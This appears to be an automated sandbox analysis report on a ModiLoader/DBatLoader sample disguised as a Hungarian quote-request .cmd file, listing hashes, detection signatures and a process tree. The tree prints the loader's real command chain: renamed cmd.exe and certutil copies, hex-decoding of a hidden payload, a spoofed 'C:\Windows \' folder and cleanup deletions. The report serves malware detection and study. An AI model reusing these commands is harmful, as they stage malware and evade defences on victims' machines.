Analysis
-
max time kernel
146s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06-11-2024 15:19
Static task
static1
Behavioral task
behavioral1
Sample
Árajánlat kérés 06.11.2024.cmd
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Árajánlat kérés 06.11.2024.cmd
Resource
win10v2004-20241007-en
General
-
Target
Árajánlat kérés 06.11.2024.cmd
-
Size
6.3MB
-
MD5
1941c21bdae085a333ca4e3adbb4e743
-
SHA1
896a4de9d86e6f63c5b6eae0d036a32ad52b9910
-
SHA256
4e21d570eaf8ad3a0f5e76e168aad06f22d8f62a6d5d62647d8df9a2938d7fd1
-
SHA512
07766b8645f7649f8a581a24887886ff8aafc367ac85860cd80665d62ef67999066e2561e085a14bd2f9fbad32c963b72f4415081999911c14176598fda78f22
-
SSDEEP
49152:uTw00WKvz5IxwmP6bPrOpl1ZHgafZ3GkCmNLKFSLsyhk1yZNvlTeyNdaurdPD59L:m
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
ModiLoader Second Stage 61 IoCs
Processes:
resource yara_rule behavioral1/memory/2656-35-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-39-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-40-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-41-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-42-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-43-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-47-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-45-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-49-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-51-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-52-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-56-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-54-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-58-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-61-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-63-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-69-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-67-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-71-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-73-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-65-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-78-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-76-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-80-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-82-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-85-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-87-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-92-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-89-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-94-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-98-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-96-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-100-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-105-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-103-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-107-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-44-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-110-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-66-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-88-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-86-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-84-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-83-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-81-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-79-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-77-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-75-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-74-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-72-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-70-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-68-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-64-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-62-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-60-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-59-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-57-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-55-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-53-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-50-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-48-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 behavioral1/memory/2656-46-0x0000000003600000-0x0000000004600000-memory.dmp modiloader_stage2 -
Executes dropped EXE 17 IoCs
Processes:
alpha.exealpha.exekn.exealpha.exekn.exeAnyDesk.COMalpha.exealpha.exealpha.pifalpha.pifalpha.pifxpha.pifper.exeper.exealpha.pifalpha.pifalpha.pifpid Process 2272 alpha.exe 2432 alpha.exe 1372 kn.exe 2320 alpha.exe 2080 kn.exe 2656 AnyDesk.COM 348 alpha.exe 2760 alpha.exe 2120 alpha.pif 1664 alpha.pif 1548 alpha.pif 2428 xpha.pif 2464 per.exe 2576 per.exe 868 alpha.pif 2748 alpha.pif 2268 alpha.pif -
Loads dropped DLL 9 IoCs
Processes:
cmd.exealpha.exealpha.execmd.exealpha.pifpid Process 2600 cmd.exe 2600 cmd.exe 2432 alpha.exe 2600 cmd.exe 2320 alpha.exe 2600 cmd.exe 2600 cmd.exe 1256 cmd.exe 1548 alpha.pif -
Suspicious use of SetThreadContext 2 IoCs
Processes:
colorcpl.exeipconfig.exedescription pid Process procid_target PID 1900 set thread context of 1200 1900 colorcpl.exe 21 PID 1288 set thread context of 1200 1288 ipconfig.exe 21 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
AnyDesk.COMalpha.pifalpha.pifalpha.pifalpha.pifcolorcpl.execmd.exealpha.pifxpha.pifalpha.pifipconfig.execmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AnyDesk.COM Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language colorcpl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid Process 1288 ipconfig.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 7 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
AnyDesk.COMpid Process 2656 AnyDesk.COM -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
AnyDesk.COMcolorcpl.exeipconfig.exepid Process 2656 AnyDesk.COM 1900 colorcpl.exe 1900 colorcpl.exe 1288 ipconfig.exe 1288 ipconfig.exe 1288 ipconfig.exe 1288 ipconfig.exe 1288 ipconfig.exe 1288 ipconfig.exe 1288 ipconfig.exe 1288 ipconfig.exe 1288 ipconfig.exe 1288 ipconfig.exe 1288 ipconfig.exe 1288 ipconfig.exe 1288 ipconfig.exe 1288 ipconfig.exe 1288 ipconfig.exe 1288 ipconfig.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
colorcpl.exeipconfig.exepid Process 1900 colorcpl.exe 1900 colorcpl.exe 1900 colorcpl.exe 1288 ipconfig.exe 1288 ipconfig.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
colorcpl.exeExplorer.EXEipconfig.exedescription pid Process Token: SeDebugPrivilege 1900 colorcpl.exe Token: SeShutdownPrivilege 1200 Explorer.EXE Token: SeDebugPrivilege 1288 ipconfig.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exeAnyDesk.COMcmd.exealpha.pifdescription pid Process procid_target PID 2600 wrote to memory of 2428 2600 cmd.exe 31 PID 2600 wrote to memory of 2428 2600 cmd.exe 31 PID 2600 wrote to memory of 2428 2600 cmd.exe 31 PID 2600 wrote to memory of 2272 2600 cmd.exe 32 PID 2600 wrote to memory of 2272 2600 cmd.exe 32 PID 2600 wrote to memory of 2272 2600 cmd.exe 32 PID 2272 wrote to memory of 2300 2272 alpha.exe 33 PID 2272 wrote to memory of 2300 2272 alpha.exe 33 PID 2272 wrote to memory of 2300 2272 alpha.exe 33 PID 2600 wrote to memory of 2432 2600 cmd.exe 34 PID 2600 wrote to memory of 2432 2600 cmd.exe 34 PID 2600 wrote to memory of 2432 2600 cmd.exe 34 PID 2432 wrote to memory of 1372 2432 alpha.exe 35 PID 2432 wrote to memory of 1372 2432 alpha.exe 35 PID 2432 wrote to memory of 1372 2432 alpha.exe 35 PID 2600 wrote to memory of 2320 2600 cmd.exe 36 PID 2600 wrote to memory of 2320 2600 cmd.exe 36 PID 2600 wrote to memory of 2320 2600 cmd.exe 36 PID 2320 wrote to memory of 2080 2320 alpha.exe 37 PID 2320 wrote to memory of 2080 2320 alpha.exe 37 PID 2320 wrote to memory of 2080 2320 alpha.exe 37 PID 2600 wrote to memory of 2656 2600 cmd.exe 38 PID 2600 wrote to memory of 2656 2600 cmd.exe 38 PID 2600 wrote to memory of 2656 2600 cmd.exe 38 PID 2600 wrote to memory of 2656 2600 cmd.exe 38 PID 2600 wrote to memory of 348 2600 cmd.exe 39 PID 2600 wrote to memory of 348 2600 cmd.exe 39 PID 2600 wrote to memory of 348 2600 cmd.exe 39 PID 2600 wrote to memory of 2760 2600 cmd.exe 40 PID 2600 wrote to memory of 2760 2600 cmd.exe 40 PID 2600 wrote to memory of 2760 2600 cmd.exe 40 PID 2656 wrote to memory of 1256 2656 AnyDesk.COM 42 PID 2656 wrote to memory of 1256 2656 AnyDesk.COM 42 PID 2656 wrote to memory of 1256 2656 AnyDesk.COM 42 PID 2656 wrote to memory of 1256 2656 AnyDesk.COM 42 PID 1256 wrote to memory of 2984 1256 cmd.exe 44 PID 1256 wrote to memory of 2984 1256 cmd.exe 44 PID 1256 wrote to memory of 2984 1256 cmd.exe 44 PID 1256 wrote to memory of 2984 1256 cmd.exe 44 PID 1256 wrote to memory of 2156 1256 cmd.exe 45 PID 1256 wrote to memory of 2156 1256 cmd.exe 45 PID 1256 wrote to memory of 2156 1256 cmd.exe 45 PID 1256 wrote to memory of 2156 1256 cmd.exe 45 PID 1256 wrote to memory of 2120 1256 cmd.exe 46 PID 1256 wrote to memory of 2120 1256 cmd.exe 46 PID 1256 wrote to memory of 2120 1256 cmd.exe 46 PID 1256 wrote to memory of 2120 1256 cmd.exe 46 PID 1256 wrote to memory of 1664 1256 cmd.exe 47 PID 1256 wrote to memory of 1664 1256 cmd.exe 47 PID 1256 wrote to memory of 1664 1256 cmd.exe 47 PID 1256 wrote to memory of 1664 1256 cmd.exe 47 PID 1256 wrote to memory of 1548 1256 cmd.exe 48 PID 1256 wrote to memory of 1548 1256 cmd.exe 48 PID 1256 wrote to memory of 1548 1256 cmd.exe 48 PID 1256 wrote to memory of 1548 1256 cmd.exe 48 PID 1548 wrote to memory of 2428 1548 alpha.pif 49 PID 1548 wrote to memory of 2428 1548 alpha.pif 49 PID 1548 wrote to memory of 2428 1548 alpha.pif 49 PID 1548 wrote to memory of 2428 1548 alpha.pif 49 PID 1256 wrote to memory of 868 1256 cmd.exe 52 PID 1256 wrote to memory of 868 1256 cmd.exe 52 PID 1256 wrote to memory of 868 1256 cmd.exe 52 PID 1256 wrote to memory of 868 1256 cmd.exe 52 PID 1256 wrote to memory of 2748 1256 cmd.exe 53
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1200 -
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Árajánlat kérés 06.11.2024.cmd"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"3⤵PID:2428
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe4⤵PID:2300
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Árajánlat kérés 06.11.2024.cmd" "C:\\Users\\Public\\AnyDesk.3gp" 33⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Árajánlat kérés 06.11.2024.cmd" "C:\\Users\\Public\\AnyDesk.3gp" 34⤵
- Executes dropped EXE
PID:1372
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.3gp" "C:\\Users\\Public\\Libraries\\AnyDesk.COM" 103⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.3gp" "C:\\Users\\Public\\Libraries\\AnyDesk.COM" 104⤵
- Executes dropped EXE
PID:2080
-
-
-
C:\Users\Public\Libraries\AnyDesk.COMC:\Users\Public\Libraries\AnyDesk.COM3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Public\Libraries\rqbnwzgR.cmd" "4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Windows\SysWOW64\esentutl.exeC:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o5⤵PID:2984
-
-
C:\Windows\SysWOW64\esentutl.exeC:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2156
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2120
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1664
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 105⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Users\Public\xpha.pifC:\\Users\\Public\\xpha.pif 127.0.0.1 -n 106⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2428
-
-
-
C:\Windows \SysWOW64\per.exe"C:\\Windows \\SysWOW64\\per.exe5⤵
- Executes dropped EXE
PID:2464
-
-
C:\Windows \SysWOW64\per.exe"C:\Windows \SysWOW64\per.exe"5⤵
- Executes dropped EXE
PID:2576
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:868
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW645⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2748
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2268
-
-
-
C:\Windows\SysWOW64\colorcpl.exeC:\Windows\System32\colorcpl.exe4⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S3⤵
- Executes dropped EXE
PID:348
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.3gp" / A / F / Q / S3⤵
- Executes dropped EXE
PID:2760
-
-
-
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\SysWOW64\ipconfig.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Gathers network information
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:1288 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Windows\SysWOW64\colorcpl.exe"3⤵
- System Location Discovery: System Language Discovery
PID:1656
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.6MB
MD56cd88b2bfbd0393afdfa6b6f85c3027d
SHA1a5873972cace8f168533581d9c8d58726a343cea
SHA256ac03131ced965fa8ec226286e0f05205d183a65b7c16998699f5e3818c2477c5
SHA512045b34cd25197b596263b54e9d2be8f6f3c325aa38b71d7673753672890d6fa0c8cb48bbf67b9060e5b43d44aaaabe1d6010cbe4a598f42ae8152b7bf289cdc0
-
Filesize
1.3MB
MD5016c16e49d556181ac963bb87370de55
SHA1767b2eb83ba37a6271a4227e2961335107ca3656
SHA256dcf06aca2916dfc30df4af6024eba3023a5540f672add8044926993e930cf0a3
SHA51269ae028e6ef9b508bfcaaed4c8163eddcd1ed908454bc5e04496d4ff552f6fb252706a6c9c20fffd2bffaf8a52685b3a25e71952c926628cec4277d77e727d7c
-
Filesize
60KB
MD5b87f096cbc25570329e2bb59fee57580
SHA1d281d1bf37b4fb46f90973afc65eece3908532b2
SHA256d08ccc9b1e3acc205fe754bad8416964e9711815e9ceed5e6af73d8e9035ec9e
SHA51272901adde38f50cf6d74743c0a546c0fea8b1cd4a18449048a0758a7593a176fc33aad1ebfd955775eefc2b30532bcc18e4f2964b3731b668dd87d94405951f7
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
15KB
MD56242e3d67787ccbf4e06ad2982853144
SHA16ac7947207d999a65890ab25fe344955da35028e
SHA2564ca10dba7ff487fdb3f1362a3681d7d929f5aa1262cdfd31b04c30826983fb1d
SHA5127d0d457e1537d624119a8023bcc086575696a5739c0460ef11554afac13af5e5d1edc7629a10e62834aba9f1b3ab1442011b15b4c3930399d91dca34b3b1cbaf
-
Filesize
94KB
MD5869640d0a3f838694ab4dfea9e2f544d
SHA1bdc42b280446ba53624ff23f314aadb861566832
SHA2560db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323
SHA5126e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
295KB
MD5ad7b9c14083b52bc532fba5948342b98
SHA1ee8cbf12d87c4d388f09b4f69bed2e91682920b5
SHA25617f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae
SHA512e12aad20c824187b39edb3c7943709290b5ddbf1b4032988db46f2e86da3cf7e7783f78c82e4dc5da232f666b8f9799a260a1f8e2694eb4d0cdaf78da710fde1